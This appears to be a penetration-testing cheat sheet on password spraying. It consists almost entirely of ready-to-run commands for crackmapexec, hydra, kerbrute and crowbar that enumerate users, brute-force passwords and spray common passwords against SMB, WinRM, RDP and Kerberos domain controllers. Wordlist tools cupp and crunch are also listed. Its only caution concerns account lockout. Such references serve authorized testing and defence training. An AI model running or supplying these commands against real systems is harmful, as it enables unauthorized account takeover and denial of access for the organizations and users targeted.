Password Spraying
Last updated
Last updated
To create passwords to target a specific user base on the information we have available:
cupp ()
crunch ()
crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
crackmapexec smb <IP> -u users.txt -p users.txt --no-bruteforce
crackmapexec smb <IP> -u users.txt -p users.txt --continue-on-success
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV
hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb
It is also possible to block user accounts. Thus, this technique should be used carefully.
python kerbrute.py -domain <domain_name>-users <users_file>-passwords <passwords_file>-outputfile <output_file>
Examples:
Username bruteforce
kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
Password bruteforce
kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
Password spray
kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
crackmapexec winrm <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
crowbar -b rdp -s <IP>/CIDR -u <USER> -C <PASSWORDS_LIST>
crowbar -b rdp -s <IP>/CIDR -U <USERS_LIST> -C <PASSWORDS_LIST>
hydra -f -L <USERS_LIST> -P <PASSWORDS_LIST> rdp://<IP> -u -vV
kerbrute:
With kerbrute.py ():